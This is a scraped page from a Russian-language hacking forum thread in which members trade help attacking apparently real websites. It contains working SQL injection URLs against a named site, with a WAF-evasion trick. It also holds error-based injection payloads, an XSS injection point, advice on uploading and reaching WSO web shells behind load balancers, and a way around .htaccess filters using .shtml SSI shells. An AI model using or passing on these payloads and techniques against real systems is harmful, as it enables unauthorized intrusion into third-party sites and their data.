Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. zloy_fantom

    zloy_fantom New Member

    Joined:
    3 Dec 2012
    Messages:
    46
    Likes Received:
    0
    Reputations:
    0
    Насколько я понял, обратное преобразование невозможно, только брут, но не могу найти брутер, поддерживающий эту функцию
     
  2. Hracid

    Hracid New Member

    Joined:
    18 Nov 2010
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    где-то на ачате видел тему что именно так в адресной строке можно прописать проксю, должным образом сконфигурированную. и даже цепочку из проксей.

    а вот по поводу домена это да. видимо не получится. спасибо за ответ! об этом я как-то не подумал, мой багаж знаний к сожалению не велик.
     
  3. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    возможно сайт на нескольких ip адресах, грузится рандомно, это делается для уменшения нагрузки. попробуйте открыть шелл через ip адрес, а не через доменное имя
     
    _________________________
  4. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    если 404 появляется во время сабмита пароля (wso) то возможно это waf какой то, попробуйте загрузить другой шелл, или любой скрипт, анализируйте поведение сервера на разные файлы
     
    _________________________
  5. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Казино, да ?)

    Если да - то там как раз несколько IP адресов, и пара из них даже дадут тебе рута)
     
    _________________________
  6. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108
    Не плодите еретические мысли господа. Что за сайт для начала? Если это высоконагруженный проект - глянь какие IP привязаны к базовому домену. Если несколько штук и они обслуживают одно БАЗОВОЕ доменное имя - лезь в ГУГЛ и читай что такое масштабирование по принципу кластерной системы. Совершенно банальный случай для хайлоад проектов. К примеру облачные решения несмотря на свою распределенность совершенно прозрачны для клиента, хотя и тут все зависит от реализации. Тоесть залил ты шелл либо картинку - у тебя не будет фокусов подобных наблюдаемым. А вот когда имеет место кластер, то как раз и кидает тебя с одного IP на другой. С личной практики могу посоветовать искать директории которые прописаны в балансировщике как статичные, тоесть например есть условие для обработки PHP(допустим в этом случае и всех остальных) файлов(условий) - это условие общее. Но для частных типов файлов или же в каких то конкретных директориях - например директория заливки аватаров может иметь статичную адресацию и не балансироваться по кластеру или например filepath может браться с этой статичной директории а на обработку тому же FASTCGI уже на другой какой IP.
     
    #22106 Cennarios, 20 Apr 2013
    Last edited: 20 Apr 2013
    1 person likes this.
  7. justonline

    justonline network ninja

    Joined:
    27 Jul 2011
    Messages:
    499
    Likes Received:
    60
    Reputations:
    53
    dle галерея. скуля в сортировке.
    кавычка экранируется слешем. помогите раскрутить?)

    форум дле поиск по топику
    тут ничего не фильтруется
     
    #22107 justonline, 20 Apr 2013
    Last edited: 20 Apr 2013
  8. Always

    Always New Member

    Joined:
    8 Feb 2012
    Messages:
    72
    Likes Received:
    3
    Reputations:
    0
    http://odnadoma.ru/?part_id=500 ORDER BY 10 -- TRUE

    http://odnadoma.ru/?part_id=500 ORDER BY 1 -- FALSE

    http://odnadoma.ru/?part_id=500 UNION SELECT 1 -- ОТСОС

    В ЧЕМ ПРОБЛЕМА? :(
     
  9. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    Такой вопосец
    .htaccess не пропускает файлы с таким разширением
    (tpl\.html|php|php3|php4|php5|phtml|pl|cgi)

    мб есть какиенибуть разширения исполняющие php код?
     
  10. justonline

    justonline network ninja

    Joined:
    27 Jul 2011
    Messages:
    499
    Likes Received:
    60
    Reputations:
    53
    злей shtml
     
  11. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    php не выполняет
     
  12. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    shtml, py

    http://ahack.ru/releases/ssi-web-shell.htm
     
    _________________________
    #22112 BigBear, 21 Apr 2013
    Last edited: 21 Apr 2013
  13. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Просто нет вывода

    http://odnadoma.ru/?part_id=500+and+1=2+union+select+unhex(hex(123))+--+

    UPD. Тут WAF прикольный кстати )

    Фильтруются запятые, учти это.
     
    _________________________
    #22113 BigBear, 21 Apr 2013
    Last edited: 21 Apr 2013
    1 person likes this.
  14. exstreme

    exstreme New Member

    Joined:
    23 Feb 2013
    Messages:
    14
    Likes Received:
    0
    Reputations:
    0
    Можно как-то раскрутить такую XSS
    Code:
    <a href="/forum/371629991/posts/2417')%7Balert('test');%7D?page=3" class="prev_page" onclick="new Ajax.Updater('comments', '/forum/371629991/posts/2417XSSHERE?page=3', { 'method': 'get', asynchronous:true, evalScripts:true }); return false;" rel="prev">…</a>
    В XSSHERE можно вставлять код, "/{} экранируется, ();' не экранируется.
     
  15. semolod91

    semolod91 New Member

    Joined:
    15 Apr 2013
    Messages:
    7
    Likes Received:
    0
    Reputations:
    -10
    нашел в плагинах браузера уязвимости через спецальный тул но не знаю как их выъявить.
    сервис показывает что есть 2 уязвимости но не говорит в каких. даже если нашел в каких, как можно найти где уязвимость?

    пс. как найти уязвимость в программном коде?
     
  16. herfleisch

    herfleisch Elder - Старейшина

    Joined:
    7 Jan 2009
    Messages:
    579
    Likes Received:
    203
    Reputations:
    13
    Линки в студию.
     
  17. WendM

    WendM Member

    Joined:
    29 Jan 2012
    Messages:
    44
    Likes Received:
    7
    Reputations:
    3
    Разобрался
     
    #22117 WendM, 23 Apr 2013
    Last edited: 23 Apr 2013
  18. Sanic1977

    Sanic1977 Banned

    Joined:
    29 Oct 2008
    Messages:
    98
    Likes Received:
    6
    Reputations:
    0
    Есть уязвимость типа
    blog.php?id=1+OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY CONCAT(MID(user(), 1, 63), FLOOR(RAND(0)*2))) --
    ответ:
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 6

    нет вывода user(), что делать?
    Как раскрутить?
     
    #22118 Sanic1977, 23 Apr 2013
    Last edited: 23 Apr 2013
  19. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    blog.php?id=1)+union+select+1,user()+--+
     
  20. Sanic1977

    Sanic1977 Banned

    Joined:
    29 Oct 2008
    Messages:
    98
    Likes Received:
    6
    Reputations:
    0
    Спасибо, за помощь

    Пишу в уязвимости:
    blog.php?id=25628)and(select 1 from(select count(*),concat(concat(user()),floor(rand(0)*2))x from(select 1 union select 2 union select 3)z group by x)a) --

    ответ:
    Every derived table must have its own alias

    что это может быть?
    как раскрутить?
     
    #22120 Sanic1977, 23 Apr 2013
    Last edited: 23 Apr 2013
Thread Status:
Not open for further replies.